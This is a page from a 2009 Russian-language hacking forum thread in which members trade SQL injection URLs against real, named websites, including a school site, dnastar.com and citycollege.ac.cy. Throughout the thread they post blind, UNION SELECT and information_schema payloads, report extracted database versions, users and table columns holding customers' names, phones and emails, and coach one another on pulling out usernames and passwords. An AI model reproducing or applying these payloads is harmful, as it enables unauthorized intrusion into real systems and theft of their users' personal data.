ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5661  
Старый 24.02.2009, 19:27
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gorev  
2 wildshaman


http://lit.1september.ru/urok/index.php?SubjectID=100010+AND+ASCII(SUBSTRING((se lect+user()),18,1))=x


я нашел слепухy

Version : 5.1.30-log
Database : dblit
User : webuser@localhost
Респект)
А как версию, юзера и Дб вытянул?
 
Ответить с цитированием

  #5662  
Старый 24.02.2009, 19:30
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

запрос перед тобой, вместо х ставь циферки Асчий... и читай про блинд скули
 
Ответить с цитированием

  #5663  
Старый 24.02.2009, 19:33
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gorev  
запрос перед тобой, вместо х ставь циферки Асчий... и читай про блинд скули
О, спс, про блинды не читал...
 
Ответить с цитированием

  #5664  
Старый 24.02.2009, 23:36
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

http://www.dnastar.com/support/FAQs1.php?faqid=-1

Не могу вытащить юзеров и пароли ихнее
а точнее вытащил из таблицы user
колонку username токо =\
дальше чет не могу так как все там перерыл
 
Ответить с цитированием

  #5665  
Старый 24.02.2009, 23:53
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

diznt, там при логине не пароль просят, а какой-то номер (Subscriber Number)

http://www.dnastar.com/support/FAQs1.php?faqid=-10+union+select+1,2,group_concat(column_name,0x2F, table_name),4,5,6+from+information_schema.columns+ where+column_name+like+'%num%'/*

ssnum/forms

может что-то из этого .. проверь на всякий случай.




2sabe

http://www.whimit.com/forum_read.php?f=17&id=75739+and+substring(version (),1,1)=4

версия 4.0. Подзапросов нет .. поковыряю еще насчет юниона
 
Ответить с цитированием

  #5666  
Старый 24.02.2009, 23:55
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

в таблице user такие колонки там

Цитата:
dnastar:user:LEADNUM
dnastar:user:FIRSTNAME
dnastar:user:LASTNAME
dnastar:user:INSTIT
dnastar:user:PHONE
dnastar:user:EMAIL
dnastar:user:NO_WEB_PRC
dnastar:user:EXEMPT
dnastar:user:datelogged
dnastar:user:username
dnastar:user:sp
dnastar:user:web_role
 
Ответить с цитированием

  #5667  
Старый 25.02.2009, 00:03
[JavaScript]
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296

Репутация: 74
По умолчанию

http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,2,3/* вроде инъекция... Но не выводит. Прошу помочь.
 
Ответить с цитированием

  #5668  
Старый 25.02.2009, 00:09
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.citycollege.ac.cy/link.php?id=-1+union+select+222,version(),1/*
 
Ответить с цитированием

  #5669  
Старый 25.02.2009, 00:09
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,concat_ws(0x3a,user(),version() ,database()),user()--
 
Ответить с цитированием

  #5670  
Старый 25.02.2009, 19:28
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

http://amxbans.snakearena.net/ban_details.php?bid=-1+union+select+1,2,3,4,5,6
вроде как инъекция, но ничего не выводит...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ